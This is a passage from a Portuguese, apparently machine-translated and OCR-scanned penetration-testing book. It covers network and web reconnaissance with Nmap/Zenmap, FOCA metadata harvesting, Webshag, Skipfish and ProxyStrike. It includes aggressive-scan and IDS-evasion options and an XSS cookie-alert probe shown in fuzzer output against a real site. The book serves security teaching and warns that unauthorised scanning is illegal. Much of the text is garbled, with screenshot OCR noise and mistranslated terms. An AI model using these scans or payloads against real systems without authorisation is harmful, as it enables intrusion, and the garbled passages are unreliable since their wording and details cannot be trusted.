uma rede. Nmap tem recursos avançados que podem detectar diferentes aplicações 
rodando em sistemas, bem como serviços e recursos de impressão digital OS. E um 

dos scanners mais utilizados rede tornando-se muito eficaz, mas também muito 
detectável. Recomendamos o uso do Nmap em situações muito específicas para 

evitar disparar os sistemas de defesa de um alvo. 


Para mais informações sobre como usar o Nmap, consulte http://nmap.org/. 


Além disso, Kali vem carregado com Zenmap. Zenmap dá Nmap uma gráfica 

interface com o usuário (GUI) para executar comandos. Embora existam muitos puristas que 
vontade 

dizer-lhe a versão de linha de comando é a melhor versão por causa de sua velocidade e 
flexibilidade, Zenmap já percorreu um longo caminho e incorporou a maior parte do Nmap 
recursos. Zenmap também oferece recursos exclusivos não oferecidos no Nmap, como 
desenvolvimento de representações gráficas de um varrimento, que pode ser usado mais tarde 
por outra 


sistemas de informação. 
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Para abrir Zenmap, ir para o Backtrack menu. Navegue até Mapeamento de Informações | 
Análise DNS, e lançamento Zenmap. 


Scam Tools Profile Help 


on 
a TE 


Command: inmap -T4 -A -w 
[Hosts Services | Nmap Output | Ports / Hosts | Topology | Host Details [Scans | 


os | Hose -| ÁÁÁ- era 


Filter Hosts 


Você vai notar sob o Perfil menu que existem várias opções para determinar 
que tipo de verificação que gostaria de executar, como mostrado na imagem seguinte: 


Intense scan 

intense scan 

Intense scan plus UDP 
Intense scan, all TCP ports 


Intense scan, no ping 


Ping scan 


Quick scan 
Quick scan plus 
Quick traceroute 


Regular scan 


Slow comprehensive scan 
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O primeiro passo é criar um novo perfil. Um perfil em Zenmap permite uma penetração 
Tester para criar o tipo de verificação para executar e que opções diferentes para incluir. 
Navegue até a Perfil menu e selecione Novo perfil ou Command para criar um novo 
perfil, como mostrado na imagem seguinte: 


Zenmap 


Scan Tools 


Target: E, sobadests dita dia Profile: Intense scar 


—— Edit Selected Profile Ctrl+E 


A 


Command [nmap -T4 -A -v 


3 à ry 
“Hosts | Services | Nmap Output | Ports/ Hosts Topology Host Details Scans 


os Host v 


Quando você seleciona Novo perfil ou de comando, o editor de perfis será iniciado. Você irá 
precisa dar o seu perfil de um nome descritivo. Por exemplo, você pode ligar para o perfil Meu 
First Scan ou qualquer outra coisa que você gostaria. 


Opcionalmente, você pode dar o perfil de uma descrição. Durante o curso de usar 

Zenmap você provavelmente irá criar muitos perfis e fazer vários exames. A natural 

reflexo pode ser a de excluir perfis postar execução. Aqui está uma palavra de conselho: perfis 
não tomar qualquer espaço e vir a calhar quando você quer recriar algo. Nós 

recomendar sendo extremamente descritivo em nomes de perfil e chegar a um 

método de nomeação padrão. Eu começo toda a minha descrição de perfil com a data, hora, 
descrição da minha posição, a minha rede local alvo de verificação e nome do cliente. 


Profile Scan Ping Scripting Target Source Other Timing 


Profile Information 


Profile name |My First Scen 


Description 3-20-13 at 11:00am CDT 
DrChaos network Scan. Target hosts 10.0.1.0/24 
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Ao concluir a sua descrição, clique no Digitalização guia. No Alvos seção, 

você vai adicionar o que os hosts ou redes que você gostaria de digitalizar. Este campo pode 
assumir 

uma gama de endereços IP (10.0.1.1-255) ou pode ter uma rede em formato CIDR 
(10.0.1.0/24). 


Você pode ver a opção -A é selecionada por padrão para permitir a digitalização agressivo. Agressivo 
digitalização permitirá a detecção de SO (-O), detecção de versão (-SV), de varredura de script (-SC) 
e traceroute (- traceroute). Essencialmente, a digitalização agressivo permite ao usuário ligar 

vários sinalizadores, sem a necessidade de ter que se lembrar deles. 


Varredura agressivo é considerado intrusivo, o que significa que será detectado pela maioria 
dispositivos de segurança. Uma varredura agressivo pode passar despercebida se o seu alvo é um 
extremamente específico de acolhimento, mas, independentemente da situação, é recomendado 
que você 

ter a permissão para fazer a varredura antes de usar este ou opção de digitalização. Como um 
lembrete, 

completar o ACK no handshake de três vias com um sistema não autorizado é 


considerado ilegal pelos padrões norte-americanos. as 
Podemos usar as informações que recebemos de nosso exercício Reconnaissance DNS para 


visar uma série muito específica. Antes de fazer isso, vamos definir algumas opções comuns em 
primeiro lugar. 


[nmap -T4 -A -v 10.0.1.D/24 


Profile | Scan Ping Scripting Target | Source Other Timing 


Scan options 


Targets (optional) 10.0.1.0/24] 


TCP scan: None 
Non-TCP scans None 


Timing template Aggressive [-T4) 
v| Enable all advanced/aggressive options (-A) 

“À Operating system detection (-O) 

Version detection {-sV) 


Idle Scan (Zombie) (-s1) 


_| FTP bounce attack (-b) 


_] Disable reverse DNS resolution (-n) 


J |Pv6 support (-6) 
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Clique no Sibilo guia. Selecione o -Pn opção bandeira tão Nmap não ping no host primeiro. 
Quando este sinalizador não estiver definido, o Nmap irá pingar seus hosts de destino e redes. 
Omissão 

definições só executar scans em hosts que são considerados vivos ou acessível. A-Pn 

diz ao Nmap para digitalizar um anfitrião, mesmo sem uma resposta de ping. Embora isto faz 

a varredura consideravelmente mais longo, o -Pn flag permite Nmap para evitar um comum 
problema de não receber uma resposta de ping, quando os pedidos de ping são bloqueados por 
defesas de segurança. 


[nmap T4 -A =v -Pn 10.0.1.0/24 Scan| 


Profile [Scan Ping [Scripting | target | Source [Othar | Timing | Help 
Ping options 


SCTP INIT pend probes 
Send SCTP INIT chunk 
E Dont t ping before scanning (~Pnij packets to see if targets are 


O ICMP ping -PD up. Geve a list of ports or 
leave the argumem blank to 


[| ICMP timestamp request (-PP) use a default port. 


O ICMP netmask request (-PM) 

C ACK ping (-PA) 2080179 
CI SYN ping (-PS) 

O UDP probes (-PU) 

O 1PProto probes (-PO) 

C SCTP INIT ping probes (-PY) 


Mooca] Esse cranoe| 


Salve as alterações feitas clicando no Salvar alterações botão no canto inferior direito 
canto. Uma vez salvo, selecione o Digitalização botão no lado superior direito da tela 
para iniciar a digitalização. Observe as suas opções e alvo que você configurou no perfil 
editor são listados. 


Scan Tools Profile Help 


Target [10.0 10/24 v | Profile [intense scan -| scan | in aj 
Command [nmap -T4 -A -v 10.0.1.024 


| Hosts Services | Nmap Output | Ports / Hosts | Topology | Host Details | Scans | 


os [Host ~ | inmap -T4 -A -v 


Starting Nmap 6.25 ( http://nmap.org ) at 2013-03-21 
00:16 COT 

NSE: Loaded 106 scripts for scanning. 

NSE: Script Pre-scanning. 


A rede Topologia guia vai lhe dar uma rápida olhada em como a digitalização no alvo 
rede foi concluída, e se você tivesse que atravessar roteadores. Neste exemplo, você vê 
a verificação permaneceu local para a rede. 
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O Hosts guia vai dar uma lista dos hosts descobertos. 


Target fiom rare E Profile [imense sean =| E í «| 


Command jemap -T4-A -v 100 40/44 


[Hows Seni ces | Nmap Owput |Pors Hosts Topatog? | Host Details | Scams | 


o - > Manto Viewer |C. Fidye) | Controis Gave Crazhic | 


9 1004103 
100 104 
10.0.1.107 
10.08 112 
10.0.4.123 
1001122 
10.0.1.125 
10.0 1140 
10.0.2.142 


Quando um host é selecionada, Zenmap irá exibir uma lista detalhada dos Exércitos, seu 
sistemas operacionais e serviços comuns. Na tela seguinte, você pode 
ver um dos nossos anfitriões é uma combinação DVR via satélite / receptor. 


Profile Help 


Target [ico 10/24 >| Profile [intense sears | E Cu 


10.0,1,1 


10.0.1.103 Ry 
: Open ports: 
10.0.1.104 FARS ô 
10.0.1.107 Closed ports: 996 
10.0,1,112 Scanned ports 1000 
10.0.1.113 Up time 79217 D 
10.0.1.122 Last boot Wed Mar 20 02:33 16 2013 
10.0.1.125 SINE 
4 100.1.140 
1001142 | IPG Not available 
MAC COND CS:ah-a0 A 
~+ Operating System 
Name Desh Network VIP 722k DVR @inux 2.6) 


o 


+ Ports used 
+ OS Classes 


+ TCP Sequence 
+ IP D Sequence 


+ TCP TS Sequence 


+ Comments 
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Se você olhar para a janela de digitalização, você não só vai ver quais portas estão abertas em 
específico 

exércitos, mas também o que as aplicações estão em execução nesses hosts. Observe que o Nmap 
pode 


determinar as coisas, como um servidor está executando o IIS 5.0 como um servidor web através da 
porta 80. O 


Resultados de pesquisa irá produzir o endereço IP do servidor, o sistema operacional do servidor é 
execução, bem como as aplicações web em execução no host. Testadores de penetração vai 
dncontrar-esses-resultados valiosos quando eles estão à procura de exploits contra este host. 


Target: [10.0.1.0/24 Ea Profile fintense scan ~| Scan] Cani 1] 
Command: [nmap -T4 -A -v 10.0.1.0/24 


Hosts | Services Nmap Output | Pors ! Hosts | Topology | Host Details [scans | 


Nä | Eee Anr e OO COCO X] 


voar win 44.0.0 42.4.0) 
DragoniOSConsole Uptime ss; 13,319 days (since Thu Mar 7 15:48:25 2013) 
airport-admin Network Distance: 1 hop 


TCP Sequence Prediction: Oifficulty#266 (Good luck!) 
daap IP ID Sequence Generation: Randomized 


domain TRACEROUTE 
ho-939 HOP ATT ADDRESS 
1 5.12 ms 10.0.1.104 


i Nmap scan report for 10.0.1.107 
jetdirect Host is up (0.0063s latency) 
netbios-ssn Not shown: 984 closed ports 
PORT STATE SERVICE VERSTON 
80/tcp open http HP Officejet Pro 8660 printer http config 
asc : (Serial CNZTKENHXODSKC) 
> | Http. favicon: Unknown favicon MDS: AL4D3BAAGAG74S6D1A77AFBIELDCB2FOF 
| http-methods: GET 
| http-title: Site doesn't have a title (text/html; charset=UTF-8). 
snet-sensor-mgmt 139/tcp open tepurapped 
ssh 443/tcp open ssl/http HP Officejet Pro 8600 printer http config 
(Serial CN27KBWHXODSKC) 
| http-favicon: Unknown tavicon MDS: Al403BAA6A6746D1A7 7AFBIELDCB2F OF 
tcpwrapped | http-methods: GET 
| http-title: Site doesn't have a title (text/html; charset#UTF-8). 
unknown | ssi-cert: Subject: commonName=HPC7761D/organizat ionNane=HP/ 
stateOrProvinceNamesdashington/countryNamestS 
| Issuer: commonNane=HPC77610/organizationNane=HP/ stateOrProvinceNane=Washington/ 
countryName-US 
Public Key type: rsa 
Public Key bits: 1024 
Not valid before: 26012-68-03714:39:21+90:08 
Not valid after: 2632-67-29714:39:21+60:00 
MOS: cade GdeB 7081 bcbe 87b acfa 2746 eld 
SHA-1: 91e5 eea 5985 t739 c950 6437 580a 5257 fB96 c5c7 


Filter Hosts 1 o dades RATI OD ATIRA DE AA. AA ELME As Ec Tom 


printer 


sun-answerbook 


Agora é possível para que você possa concentrar seus esforços na meta de correr web 
serviços ou a porta 80, porque é aberto. 


Zenmap é a melhor maneira para obter uma saída de scans do Nmap. Zenmap oferece uma 
rica 

interface gráfica do usuário que exibe exames que podem ser exportados em diferentes 
formatos, como texto ou Microsoft Excel. 
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Embora haja muitas maneiras de obter saídas de Nmap (por exemplo, os autores 

neste livro preferem as técnicas de linha de comando), incluímos esta técnica 

porque ele é constantemente referenciado em muitos padrões de penetração da web e é um 
forma comum para as pessoas a usá-lo. 


Nmap Output | Ports / Hosts | Topology | Host Details | Scans | 


nmap -T4 -A -v 10.0.1.0/24 


Initiating SYN Stealth Scan at 19:58 
Scanning 5 hosts [1000 ports/host] 
Discovered open port 8888/tcp on 10.0.1.104 
Discovered open port 8080/tcp on 10.0.1.107 
Discovered open port 445/tcp on 10.0.1.107 
Discovered open port 53/tcp on 10.0.1.103 
Discovered open port 22/tcp on 10.0.1.103 
Discovered open port 80/tcp on 10.0.1.103 
Discovered open port 80/tcp on 10.0.1.107 
Discovered open port 443/tcp on 10.0.1.107 
Discovered open port 80/tcp on 10.0.1.104 
Discovered open port 443/tcp on 10.0.1.104 
Discovered open port 139/tcp on 10.0.1.107 
Discovered open port 53/tcp on 10.0.1.1 
Discovered open port 9100/tcp on 10.0.1.107 
Discovered open port 631/tcp on 10.0.1.107 
Discovered open port 9290/tcp on 10.0.1.107 
Discovered open port 9111/tcp on 10.0.1.107 
Discovered open port 6839/tcp on 10.0.1.107 
Discovered open port 9110/tcp on 10.0.1.107 
Discovered open port 9102/tcp on 10.0.1.107 
Discovered open port 9220/tcp on 10.0.1.107 
Discovered open port 515/tcp on 10.0.1.107 
Discovered open port 9101/tcp on 10.0.1.107 
Discovered open port 787/tcp on 10.0.1.104 
Discovered open port 7435/tcp on 10.0.1.107 
Completed SYN Stealth Scan against 10.0.1.104 in 
1.27s (4 hosts left) 

Completed SYN Stealth Scan against 10.0.1.107 in 
1.27s (3 hosts left) 

Discovered open port 5009/tcp on 10.0.1.1 


Além disso, varios lugares em GUI para Zenmap permitem ao usuario exportar graficos e 
certas partes do relatório em arquivos CSV ou arquivos de imagem. Essas exportações são 
extremamente 

valioso na criação de relatórios. 


Nmap Output | Ports / Hosts Topology | Hast Details | Scans | 


+ Hosts Viewer | Q Fisheye | i Controls] (ed Save Graphic | 


FOCA - site metadados Reconnaissance 


Você sabia toda vez que você criar um documento, como um PowerPoint Microsoft 
apresentação, documento do Microsoft Word ou PDF, metadados é deixado no documento? 
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O que são metadados? Metadados são dados sobre dados. É a informação descritiva sobre 

um determinado conjunto de dados, objeto ou de recursos, incluindo a forma como ele é formatado, 
bem como 

quando e por quem foram recolhidas. Os metadados podem ser úteis para testadores de penetração, 
porque ele contém informações sobre o sistema em que o arquivo foi criado, tais como: 


* | Nome de usuários logados no sistema 
e Software que criou o documento 


e | OS do sistema que criou o documento 


FOCA é uma ferramenta de segurança e auditoria que irá examinar os metadados de domínios. 
Você 

pode ter FOCA usar motores de busca para encontrar arquivos em domínios ou usar arquivos 
ODA é construído em Kali, no entanto, a versão é datado. A melhor prática é baixar 

a versão mais recente. FOCA tem sido tradicionalmente uma ferramenta do Windows, ea mais 
recente 

versões podem estar disponível apenas para Windows. 


A última versão do FOCA pode ser baixado em: http://www. informatica64. 
com.br / DownloadFOCA (Use o Google Translate para ver a página em Inglês). 


Você precisará dar o seu endereço de e-mail na parte inferior da tela. Você irá 
receberá um e-mail com o link de download. Você também vai receber atualizações quando FOCA 
tem novos lançamentos. 


1. A primeira coisa a fazer depois de lançar FOCA é criar um novo projeto, como mostrado 
nas imagens seguintes:. 


TOCA free 3.2 


A FOCA 3.2 


Compiled flags [ FREE ] 


Uaa mior 
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FOCA Free 3.2 


deveria 


t , , P i 
Q Recomendamos manter todos os arquivos do projeto em um único lugar. Você 
criar uma nova pasta para cada projeto. 


2. Uma vez que o nome do seu projeto e decidir onde você deseja armazenar o projeto 
arquivos, clique no Criar botão, como mostrado na imagem seguinte: 


Would you like that 
FOCA TEAM makes a 
penetrabion test on 


vour web site 


cach (Din nbled in toe version) 
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3. A próxima coisa a fazer é salvar o arquivo de projeto. Uma vez que você salvou o projeto, 
clique em 
no Procurar Todos botão para FOCA vai usar motores de busca para procurar por 
documentos. Opcionalmente, você pode usar os documentos locais. 


Test Project - FOCA Pree 2,7 


frimeject "Took Options o Tastist | About (Donate 


Adc W xia M ppm: hr ax 
Aot wie yi xix be oo 
rs Wok yaw wed 


10/27/2012 105.31. 
Jóna need camion ducta services (Gocursentn’ DC. 10/27/2012 1 03:32 
É ANT af et COnL Tne sous DO ca E doc 10/27/2012 1 03:32 
Near newt OO DI ducts_senices documents OC 10/27/2012 1:03:35 
J PNI PAR Con pO Gucta_pervicss Cocunentr Do 10/27/2012 1 0836 
SP PONHO PA DOER pn duas senas idos urante, TO 10/27/2012 | Pile 
J Aereew werd com products serrces coc mverds C 10/27/2012 1:05.35 

A Aen are cone rerkets fede NH Eno 10/27/2012 103.36... 
Piwan meet com foder regea MHL ds 10/27/2012 105.57 
É Aone meros comtrenets Aedes NH Ids 1027/2012 10537 
jinna mii com faders mages (MH IC ads 10/27/2012 10319 
J beeen sred com federal rreges MHIE ade 1/27/2012 105.38 


4. Clique com o botão direito do mouse no arquivo e selecione o Baixar opção, como se 
mostra na 
tela a seguir: 


vos Home Desktop" DigtallieDeck potx 

Hip: ‘Awww wert com products semces “documenta TE. . 
htip:/"Awww wert com/mesoun/doces/cep.doc 

ntip:/(Awww wet com/products ssmvicas/documeme/CC... 
htip:/ Awww wer com/products_servicee “documenis,Qo... 
Htip:/Anwew wer com/products_services.‘documents DC 


y Extract Metadata 
Hips: Awww wat con/producds_services/doomenis/C 


hip: enem wert comímorkets federal NIH] Exis Extract Al Metada 
Ptip:/ Mena weri com Sederalimaçes/NI H2xds -= Analyze Metadata 
http://www wan com/markete feder=l/N F3 ds 
htip./ Aww wer comfederavimages Mi H1C de 
Hip: Avewew wer comfederal/images Ni H1Bads Add folder 


Add Ae 


X AXAXXXXAXAXXXX 


Add URLs from fe 


Link 
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5. Clique com o botão direito do mouse no arquivo e selecione o Extrair Metadados opção, como 
se mostra na 
tela a seguir: 


o vs vcs me 
ova yin vm 
Ji Vb Awe ot 


pe Home Densa Degtaiteleos pot. 
(werk eek com products services documents CT kear rae- pri 
jara e cor Sa li eo So 220214 
WHT PR OA ras serves. aert CC WW LAN 
Swern fet. com wrodkcts_servces focuwrts Go W201 18 uM 
Werk wht com qrodects servicos Senseerts TO 1702017 1993 
neem wet com products sarees bamet T 1/21/3012 1:23.35 
rere mod Cte St ete eter RINTE ay WINO 19996 
mern ert. corn Secdesi “reagan WH? em 2/77/2012 10837 
Swern weet corn martias beckons Witt ndo W27/2012 1:93:37 
imaa wet core todas magas Wi} TC ate 1/21/0012 12919 
wra mond, Came Pectoral rms MINTE ate WT 2012 1:09 18 


mp 
™ 
w 
e 
p 
wpe 


FERE 


6. Clique com o botão direito do mouse no arquivo e selecione o Analisar Metadados opção, 
como se mostra na 
a tela a seguir: 


pat Hora Destop Ogli Deck ppa 
wn mat com piata perom documenta CL OTAN 1.08 w 
Swern arnt com e Soca een doc tos 1 
w sra com products services documenta CL TZ 1083 
evn pret com products sersces documenta Do 0/27/2011 
ee 1 ZV B12 108-34 
(wer met om mts OTA 140836 


pen te C/E SG | Ee IZVAN 106%. Smet Peete 
wan pret com tetera megas 18 xa 122012 1.06.37 3705 Extract Ad ataca 
ewe m ome aia Mrs i) ao 10202012 10437 
er mwt com Sectoral trago MIC ndo “OU 10438 
e mrad cm Ami drag IH E ole WW 1043 
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Na tela seguinte, você pode ver duas pessoas abriram neste documento. 


ÉS Operatrg Sytem (E) 
MD, Paavon (0 


Você também pode determinar o Microsoft Office para o Mac e Adobe Photoshop foram 
usado para criar este documento, como mostrado na imagem seguinte: 


p Tee Pood 


H mj Cents (1) 
= 8 Serven (M 
A Uniacatad Saves 
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Em muitos casos, os atacantes serão capazes de ver muito mais informações e reunir 
inteligência sobre um alvo. 


FOCA permite ao usuário salvar e índice de uma cópia de todos os metadados. Além disso, 
cada tipo de arquivo de metadados podem ser salvas e copiado. Isto dá um verificador da 
penetração 

uma riqueza de informações. Imagens são normalmente utilizados para dar uma visão geral do 
arquivos indexados, juntamente com uma lista de todos os arquivos individuais. Finalmente, foca 
permitirá uma 

Tester Penetração baixar arquivos individuais que podem ser usados como exemplos. 


Resumo 


Reconhecimento é normalmente o passo mais crítico em um exercício de Teste de Invasão 

e pode ser o mais demorado. Quaisquer ações tomadas contra a meta é 

personalizado em torno de resultados de reconhecimento anteriormente realizadas. O mais 
dados conhecidos sobre um alvo equivale ao menos susceptíveis de desencadear alarmes, bem 
como . 

melhor chance de identificar uma maneira de comprometer o alvo. E recomendado 

olhar para este capítulo como um pré-requisito para os capítulos restantes deste livro. 


Neste capítulo, nós nos concentramos em várias maneiras de coletar informações sobre um alvo. Nós 
apresentou algumas ferramentas gratuitas populares disponíveis na Internet, bem como informações 
Reunindo utilitários disponíveis em Kali Linux. Neste ponto, você deve estar pronto para 

avaliar alvos identificados por meio de reconhecimento para possível exploração. 


O próximo capítulo vai se concentrar em identificar e explorar vulnerabilidades em web 
aplicativos e servidores web. 
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Um servidor, por definição, é um sistema de IO, dedicada a execução de serviços para os 
usuários e 

outros computadores em uma rede. Exemplos de faixa de serviço a partir de serviços públicos, tais 
jogos on-line como a partilha de arquivos confidenciais dentro de uma grande organização. No 
contexto 

da arquitetura cliente-servidor, um servidores é um programa de computador que está executando 
para servir 

os pedidos de outros programas, conhecidos como os "clientes". Assim, o servidor executa 
alguma tarefa computacional em nome de "clientes". Os clientes ou executados no mesmo 
computador ou ligue através da rede. Por exemplo, um servidor que hospedar um jogo 

para o mundo enquanto os clientes poderiam acessar o jogo remotamente. Existem várias formas 
de prestação de serviços aos clientes, tais como um servidor Web Apache HTTP ou limitada a um 


SENidBrAe divas BoE alado har Tais com a carga de atender grande 


volumes de clientes. Isso significa que a adição de processamento, memória adicional e 
armazenamento tornando esses ativos valiosos alvos para hackers. Organizações tipicamente 
gerenciar servidores remotamente e não monitorar ativamente a atividade, ou seja, pequenas batidas 
em desempenho ou outros indicadores de que está sendo comprometida pode passar despercebida. E 
comum encontrar usuários mal-intencionados já acessou servidores comprometidos por longos 
períodos 

de tempo antes de os proprietários que identificam a vulnerabilidade usada para acessar o sistema. 


Este capítulo se concentrará na identificação e exploração de vulnerabilidades em web 
servidores de aplicativos. Vamos começar com apresentando ferramentas disponíveis no Kali 
usados 

para identificar vulnerabilidades. Em seguida, vamos nos concentrar na exploração de 
vulnerabilidades para ganhar 

acesso a servidores de aplicativos web. Concluiremos com outros métodos de acesso 
serviços de aplicativos web. 


Ataques do lado do servidor 


A avaliação da vulnerabilidade 


Ataques do lado do servidor estão explorando e encontrar vulnerabilidades em serviços, portos, 
e aplicações rodando em um servidor. Por exemplo, um servidor web tem vários ataque 
vetores. E um servidor com um sistema operacional e executando várias peças de 

software para fornecer funcionalidade web. Ele tem muitas portas TCP abertas. Cada um de 
esses vetores poderia colher uma vulnerabilidade que um invasor pode explorar para entrar 

o sistema e obter informação valiosa. Muitos protocolos em servidores são tratados 

através de texto não criptografado legível. 


Vamos dar uma olhada em algumas ferramentas disponíveis no Kali para identificar 
vulnerabilidades 
em servidores. 


Webshag 


Webshag é uma ferramenta multi-threaded, multi-plataforma utilizada para auditar servidores web. 
Webshag reúne funcionalidades geralmente úteis para servidores web, como o porto 

digitalização, digitalização e arquivo de URL difusão. Ele pode ser usado para fazer a varredura de 
um servidor web em 

HTTP ou HTTPS, através de um proxy e usando a autenticação HTTP (básica ou Digest). 

Além disso, Webshag pode usar recursos de evasão de IDS que visam tornar correlação 

entre os pedidos mais complicado. 


Webshag oferece capacidades inovadoras adicionais, tais como recuperar a lista de 

nomes de domínio hospedado em uma máquina de destino, bem como de difusão usando 
dinamicamente 

nomes de arquivos gerados. Webshag pode realizar impressões digitais de páginas da web ao 
mesmo tempo que 

resistente a alterações de conteúdo. Este recurso foi projetado como uma remoção de falsos 


ear RERE RES na HE ROLERO Le HaGgensole de linha de comando e 


ponivel com 
as plataformas Linux e Windows. Webshag pode ser encontrado em Aplicações Web 
|Scanners de Vulnerabilidade Web como webshag-gui. 


Webshag é fácil de utilizar. Cada recurso tem uma aba na parte superior. Selecione o recurso 
desejado 

guia, insira em seu URL de destino sob o espaço de destino e clique em Ok para executar. Você 
pode executar várias abas simultaneamente. As características incluem Porto de digitalização, 
Aranha, URL 

Digitalizar e Fuzzing. Os próximos quatro imagens mostram Webshag realizando uma varredura de 
portas, 

rastreamento de aranha web, varredura URL e arquivo de Fuzz www .thesecurityblogger.com: 
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webshag 1.10 


PSCAN INFO SPIDER USCAN FUZZ 
semings 
Target [host | IPv4] 
wura thesecurityblogger.com 
Results 
Open Ports: Port Details: 
587 
80 


Console 


INFO Scan of www.thesecurityblogger.com finished 
INFO Found ? oper ports 


Status 
idle. Last scan finished @ 17/04/2013 12:05:30 


PSCAN INFO SPIDER USTAN FUZZ 


Settings 
Target [host | IPv4]: Post [801 Start [index.htmi] 


| Www. thesecuntybloggercom BO 


Resists 
intemal directores 


wer contenuposds/20 1 Le 


extemal links 
Www Gefinethecioud net 
wwwlockpickinglOl.com 
www_nactac.com 
www pauidotcom. com 
www memestreams.net 
www? wwt com 
wordpress org 
aitomattic_corr 
www feedburner corr 

Console: 


NFO Spidering www Thesecurity blogger 
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webshag 1.10 


PSCAN INFO SPIDER USAN FUZZ 


setongs 


Targetís) (hostil, host2....}: Portis) [80, 8080,...]: 
www Thesecurtyslogger.com lao 


Root directodes |/, fdiry....k: Skip String [Not Found}: 


j | automatic 


Results 
Tergets Results: 


Seorchtext=scriptaiertdocument cookle/sorn pt&PhraseSearchText=scriptalertdocument.cookic 
scriptéSearchContem Class ID=-14SearchSectioniID= LG SearchDate=- 1&SearchButton=Search 


(301) Andex. phatcontent/searchy?SectiowtiD= 34 Search ext=<script>alert(document. cookie)</ 
script e 

Redirected to: http wwe thesecurty blogger comycontent/searchy? 
SectionID=36:SearchText=scriptalertdocument.cookie/script 


Request faled. Server may be overloaded 
Request failed. Server may be overloaded 
Request failed. Server may be overloaded. 
Request failed. Server may be overloaded. 
Request failed. Server may be overloaded 


webshag 1.10 


PSCAN INFO SPIDER USCAN FUZZ | 


Settings 
Target(s) [host], host2,...] Portis) [80, 8080,.. ): 
| wren thesecurityblogger.cor (Bo Stop 


Root directoties L ddir/,...] Expression [log fa-z}{L}H0-9}{2} txt] 
f & Fuzz Directories & Fuzz Files switch to Gen Mode 


cgi-bin 
stats) 
wp-content 


wp-ine ludes; 
= aaa 


Console: 


TARGET Scanning wweethesecuntybloggercom / 80 
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Webshag oferece exportar todos os dados encontrados durante uma auditoria no XML, HTML e 
Formatos de arquivo TXT. O relatório final da Webshag é organizado em um formato lógico tornando- 
se 


digno de ser usado como um documento independente ou artigo de referência para um teste de 
penetração 
relatório de entrega. As duas próximas imagens mostram exportadores opções e ao topo de uma 
relatório de auditoria: | 
Export Report... 
Export Results: 
Mm Port Scanner © info © Spider @ URL Scanner 4 Fuzzer 

Output File: 

jroot/Desktop/results Open | 

Output File Format: 


xmi X | 


Audit Report 


Port Scanner 


64.90.50.80 


Mais informações sobre Webshag pode ser encontrada em 
http:/www.scrt.ch/en/attack/downloads/webshag. 


n__n] 
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Skipfish 


Skipfish é uma ferramenta de reconhecimento de segurança de aplicativos web. Skipfish prepara um 
mapa do site interativo para o alvo usando rastreamento recursivo e sondas à base de dicionário. 
O mapa resultante fornece saída após ser escaneado por verificações de segurança. 


Skipfish pode ser encontrado em Aplicações Web |Scanners de Vulnerabilidade Web como 
skipfish. Quando você abre Skipfish, um Terminal janela pop-up mostrando 

comanda o Skipfish. Skipfish pode usar dicionários internos ou personalizáveis para 
avaliação de vulnerabilidade. 


Note-se que alguns dicionários não pode ser encontrada em Kali. Você pode 


EM ( baixar a última versão do Skipfish e padrão dicionários 
Qe a partir de https://code.google.com/p/skipfish/. 


Os dicionarios disponiveis estao localizados no dicionario arquivo. 


ries# Is 


complete.wl ext -ONLY .wl WL minimal .wl 


Existem varias opções de comando disponíveis em Skipfish. Para executar Skipfish contra um 

alvo site usando uma lista de palavras personalizada, insira skipfish, Selecione sua lista de palavras 
usando 

o -W opção seguida pela localização da lista de palavras, selecione o diretório de saída 

utilização -O seguido do local, e, finalmente, o sítio alvo. 


Skipfish-o (local de saída)-W (localização da lista de palavras) (site destino) 


O exemplo a seguir mostra uma varredura usando uma lista de palavras chamada complete.wl 
em 

securityblogger.com. Skipfish irá criar uma pasta cnamada Skipfishoutput 

no ambiente de trabalho. Isto é executado usando a palavra-chave skipfish,-O / root / Desktop / 
Skipfishoutput para especificar o local para o qual enviar a saída, -W / root / 

Desktop / complete.wl para especificar a localização do dicionário e http:// 

www thesecuirtyblogger.com como o alvo para fazer a varredura contra. 
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Note-se que o padrão skipfish dicionários não será executado quando se utiliza o 

-W comando. Você pode copiar uma lista de palavras padrão e remover o read-only 

na primeira linha da lista (# ro) para ser executado como uma lista de palavras personalizgda. 
Isto é mostrado 

na imagem seguinte: 


complete wl 


Fie Edit Search Optors Heip 


Se não houver erros de compilação, você será presenteado com uma tela de lançamento que 
estados a digitalização começará em 60 segundos ou ao pressionar qualquer tecla. 


Welcome to skipfish, Here are some useful tips: 


1) 


To abort the scan at any time, press . A partial report will be written 
to the specified location. To view a List of currently scanned URLs, you can 
press at any time during the scan. 


Watch the number requests per second shown on the main screen, If this figure 
drops below 100-200, the scan will Likely take a very Long tine. 


The scanner does not auto-Limit the scope of the scan; on complex sites, you 
may need to specify Locations to exclude, or Limit brute-force steps. 


There are several new releases of the scanner every month, If you run into 
trouble, check for a newer version first, let the author know next. 


More info: http://code. google, com/p/skipfi 
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Você pode pressionar a Barra de espaço para ver os detalhes sobre a pesquisa ou ver os números 
padrão 

executar. Digitalizar um alvo pode levar de 30 segundos a algumas horas para completar 

o processo. Você pode terminar uma varredura cedo digitando Ctrl +C. 


Uma vez que a verificação for concluída ou se você terminá-la cedo, Skipfish irá gerar uma tonelada 
de saída 

arquivos no local especificado quando se utiliza o -O opção de designar uma pasta de saída. 

Para ver os resultados, clique no index.html arquivo, o que fará com que uma Internet 

navegador. Você pode clicar nas caixas drop-down para ver os resultados. Veja o 

exemplo relata seção para obter mais informações. 


skipfish 
Crawl results - click to expand: 


o — bttp://wwwexample.com/ @3 B6 567 
© New 904 signature seen 
7 


U New 'Server header vahie seen 
1. 


> include 
READMI 
> toons 4 2 a 


index html 


Document type overview - click to expand: 


application/ xhtml +xml 
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ProxyStrike 


ProxyStrike é um proxy de aplicação web construída para identificar as vulnerabilidades enquanto 
navega 
um aplicativo. Ele funciona como um proxy na porta de escuta 8008 por padrão, o que significa que 
tem que configurar o seu navegador de Internet para ser executado através ProxyStrike para que ele 
possa 
analisar todos os parâmetros em segundo plano enquanto o surfe site do alvo. 
s características de proxy são ótimos para identificar, interceptar e modificar. pedidos.. 
ara ar um navegador de internet, como O Firefox para usar Proxy trike, selecione em FireFox 
Preferências |Avançado |Rede e selecione Configurações. Selecionar Proxy manual e 
digite o endereço IP do seu servidor de Kali seguido pelo porto de 8008 (A menos que você está 
pensando 
para alterar a porta padrão ProxyStrike). 


O Advanced 


DETERS- S Dias 


General Tabs Content Applications Privacy Security Sync Advanced 


Configure Proxies to Access the Internet 
No proxy 
Auto-detect proxy settings for this network 
Use system proxy settings 
i+) Manual proxy configuration 


HTTP Proxy: |172.16.76.131 | Port: 8008 


Use this proxy server for all protocols 


SSL Proxy: 
FTP Proxy 


SOCKS Host: 


_)SOCKS v4 |» SOCKS v5 
